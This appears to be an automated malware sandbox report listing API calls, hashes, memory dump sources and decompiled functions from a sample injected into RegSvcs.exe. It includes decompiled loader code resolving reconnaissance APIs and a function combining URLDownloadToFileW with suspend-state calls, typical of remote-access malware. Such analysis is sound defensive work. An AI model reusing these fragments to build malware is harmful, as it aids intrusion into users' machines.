                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0130777B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: e7355b33a840c308b349e4727c6c3a16ccb482f526f773ec5128e19a7fff19cb
                                            • Instruction ID: d37de647b08f45d6649ff5c1284f5a6c0fcf5118fd4a49930087cf16e12365cc
                                            • Opcode Fuzzy Hash: e7355b33a840c308b349e4727c6c3a16ccb482f526f773ec5128e19a7fff19cb
                                            • Instruction Fuzzy Hash: BBF0E932D007129BE777BB7C5822B6D77E0AF10BACF10015DE180A72C1DB7875409B69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01341CA1, Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 535071b5f9a53023d1a4737dbca30e5f7f54259fea91f47eec0e7baba2a8a847
                                            • Instruction ID: ab071cbea98719ea3acff0be82130c89d849afc01e1557c4f4ef6b64d223eac9
                                            • Opcode Fuzzy Hash: 535071b5f9a53023d1a4737dbca30e5f7f54259fea91f47eec0e7baba2a8a847
                                            • Instruction Fuzzy Hash: 98E14E75600609AFCB14DF98D880EAAB7F9FF88314F108699E909DB255D731FA85CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013694BA, Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 013694C9
                                            • SysAllocString.OLEAUT32(00000000), ref: 01369592
                                            • VariantCopy.OLEAUT32(?,?), ref: 013695C9
                                            • VariantClear.OLEAUT32(?), ref: 0136960A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Variant$AllocClearCopyInitString
                                            • String ID:
                                            • API String ID: 2808897238-0
                                            • Opcode ID: 67a026724bc5b124a14e9a34d9a74f3a4d9d19a8b0ac4d14ea1c3ad94970d99a
                                            • Instruction ID: fd2d6934abc9e8d6f8a4ce49750bdbb5d3e9f4cfc7a55cd44ea8809b6b83002d
                                            • Opcode Fuzzy Hash: 67a026724bc5b124a14e9a34d9a74f3a4d9d19a8b0ac4d14ea1c3ad94970d99a
                                            • Instruction Fuzzy Hash: 0651D63521020AAACB10FF29D8406AAB768EF94369F40C57AFE09D7654DB30DA55C7E2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0130407F, Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                            • String ID:
                                            • API String ID: 2782032738-0
                                            • Opcode ID: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
                                            • Instruction ID: f28059b32514976dfa964ae41b8da9254ea857a8e4085836caab5efccee68715
                                            • Opcode Fuzzy Hash: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
                                            • Instruction Fuzzy Hash: D441B331B006099BEB2ACF6DC96465FBBF5AF90268F248528D615976C0D770EB50CB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0131075F, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01310793
                                            • __isleadbyte_l.LIBCMT ref: 013107C6
                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 013107F7
                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 01310865
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: ba2ec85ac1d5bae8615daf9618cecf4d898ff033c3b31ffbc1219748db14dc38
                                            • Instruction ID: 713265e01a40fc68579e57e7eca41c57c5ab1020be6e80a152e24a1af747e3ec
                                            • Opcode Fuzzy Hash: ba2ec85ac1d5bae8615daf9618cecf4d898ff033c3b31ffbc1219748db14dc38
                                            • Instruction Fuzzy Hash: 2431E331A04246EFDB2DDFA8C880ABA7FA5BF00318F188569F5658B199D730D9D0DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FE2C0, Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 012FE2E2
                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 012FE3A7
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: IconNotifyShell__memset
                                            • String ID:
                                            • API String ID: 928536360-0
                                            • Opcode ID: 2f52bfdd67e501d52805922432cb75417d99dccb2b96abbe2f331d9f4c259674
                                            • Instruction ID: fec691015b7190b8cde3997fc5b22a9764ac06c722f3493a4396f3de22388c45
                                            • Opcode Fuzzy Hash: 2f52bfdd67e501d52805922432cb75417d99dccb2b96abbe2f331d9f4c259674
                                            • Instruction Fuzzy Hash: 193169706187419FE332CF28D4597A7BBE8FB45318F01482DE6EA83280E7B5A548CF52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0132494A, Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                            • String ID:
                                            • API String ID: 1597257046-0
                                            • Opcode ID: 88e6545caa3930bb0d9a4370d735eaaf604f7638607d6d4904bff09011406cdc
                                            • Instruction ID: c2398a857fa57419c4a879870c9597b1937be6530558b73ff470afbe7d1022fd
                                            • Opcode Fuzzy Hash: 88e6545caa3930bb0d9a4370d735eaaf604f7638607d6d4904bff09011406cdc
                                            • Instruction Fuzzy Hash: 11018131200241AFD325EBADC895E2BB3EDEF89318B00852DE55A8B790DB35E800C760
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FF570, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: ?T
                                            • API String ID: 4104443479-3504941901
                                            • Opcode ID: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
                                            • Instruction ID: e8e2b26a26d8ae46346ba4dda4f3b1fb91985acf01fd0a5fa1955df0df0ee493
                                            • Opcode Fuzzy Hash: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
                                            • Instruction Fuzzy Hash: BE11D6B252011AAFC708DF68D8C19AEB7ACEB14248F54417DEA06C7601E771FE15C7D4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0133CDB9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                            Download Yara Rule
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(00000013,00000000), ref: 0133CDEE
                                            • _memmove.LIBCMT ref: 0133CE15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ArrayCreateSafeVector_memmove
                                            • String ID: crts
                                            • API String ID: 564309351-3724388283
                                            • Opcode ID: 37b39223f38f8adbda125c11beee415c0b384acd8871e2f35fa9fe5b8a6b7ac5
                                            • Instruction ID: 4b7272c18375b3b20790454bafb0ffd3390ed5c5184fc6e460ba6e277027903e
                                            • Opcode Fuzzy Hash: 37b39223f38f8adbda125c11beee415c0b384acd8871e2f35fa9fe5b8a6b7ac5
                                            • Instruction Fuzzy Hash: C90180B7900119ABD710DF59EC44F9BB7A8EB94355F50412AFE08D7140D731EA56CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01322175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __fread_nolock_memmove
                                            • String ID: EA06
                                            • API String ID: 1988441806-3962188686
                                            • Opcode ID: 414dd4dc28edb51f81838bd51eb70ac097eb60f18ecc334a780063686eba5a17
                                            • Instruction ID: 02417f25c08984b7f14b7cb79efe327543682317f34067f35e191f2208d372a3
                                            • Opcode Fuzzy Hash: 414dd4dc28edb51f81838bd51eb70ac097eb60f18ecc334a780063686eba5a17
                                            • Instruction Fuzzy Hash: D5014931C042287BCF19DB9C8C55EEEBBF49F15305F00859DF69692281D574A718C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: RegSvcs.exe PID: 6824 Parent PID: 6624 RegSvcs.exeCOMMON

                                            Executed Functions

                                            Function 013BD2A6, Relevance: 210.9, APIs: 117, Strings: 3, Instructions: 868sleepfilenetworkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013BD2BC
                                            • SetEvent.KERNEL32(?), ref: 013BD2C5
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013BD2CE
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F525DF0), ref: 013BD2E8
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(013CB310), ref: 013BD2F9
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013BD308
                                              • Part of subcall function 013C29EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C29FA
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A11
                                              • Part of subcall function 013C29EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5), ref: 013C2A27
                                              • Part of subcall function 013C29EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 013C2A45
                                              • Part of subcall function 013C29EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A4F
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A58
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A6D
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A7A
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ACC
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2AD5
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ADE
                                            • GetTickCount.KERNEL32 ref: 013BD33C
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,013CB310,00000000,?,?,00000000), ref: 013BD39C
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,013CB310,00000000,?,?,00000000), ref: 013BD3AC
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,013CB310,00000000,?,?,00000000), ref: 013BD3BC
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,013CB310,00000000,?,?,00000000), ref: 013BD3CC
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,013CB310,00000000,?,?), ref: 013BD3DC
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013CB310), ref: 013BD3E6
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 013BD402
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD40E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD41A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD426
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD432
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD43E
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BD44A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD456
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD462
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 013BD474
                                            • atoi.MSVCRT ref: 013BD47B
                                            • Sleep.KERNEL32(00000064), ref: 013BDD60
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 013BDD83
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 013BDD95
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BDDB0
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 013BDDBB
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 013BDDDD
                                            • URLDownloadToFileW.URLMON(00000000,00000000), ref: 013BDDE5
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BDDF9
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013BDE0D
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 013BE6AC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BE6B5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@DownloadEventFileSleepTickV01@atoi
                                            • String ID: $$PowrProf.dll$SetSuspendState
                                            • API String ID: 2465730144-1158640710
                                            • Opcode ID: e83c10b23259fba7b87c5e760dc811a7f5410fcae5e2be0c3f518b6307e1e4a3
                                            • Instruction ID: d030f17c7445c86531c96f1277e09ad48150125fb6e9ad235b3a93644b9b225c
                                            • Opcode Fuzzy Hash: e83c10b23259fba7b87c5e760dc811a7f5410fcae5e2be0c3f518b6307e1e4a3
                                            • Instruction Fuzzy Hash: 10526371A00219AFDB14BBB8EC9DAFE7B6CFF64719F000469E602D6485FF7469048B51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B9908, Relevance: 77.1, APIs: 26, Strings: 18, Instructions: 92libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E013B9908() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t22;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x13cbc94 = _t2;
				if(_t2 == 0) {
					 *0x13cbc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x13cbc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x13cbc94 == 0) {
					 *0x13cbc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x13cbca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x13cc1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x13cc1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x13cbc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x13cbcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x13cbca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x13cbc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x13cbca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x13cbc9c = _t22;
				return _t22;
			}






                                            0x013b991b
                                            0x013b9924
                                            0x013b992c
                                            0x013b9933
                                            0x013b9944
                                            0x013b9944
                                            0x013b995f
                                            0x013b9964
                                            0x013b9975
                                            0x013b9975
                                            0x013b9993
                                            0x013b99a7
                                            0x013b99bb
                                            0x013b99cf
                                            0x013b99e3
                                            0x013b99f7
                                            0x013b9a0b
                                            0x013b9a1c
                                            0x013b9a24
                                            0x013b9a28
                                            0x013b9a2e

                                            APIs
                                            • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,013CBA38,013CBCB0,00000000,013B8F24,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B991B
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B9924
                                            • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B993F
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B9942
                                            • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9953
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B9956
                                            • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9970
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B9973
                                            • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9984
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B9987
                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9998
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B999B
                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B99AC
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B99AF
                                            • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B99C0
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B99C3
                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B99D4
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B99D7
                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B99E8
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B99EB
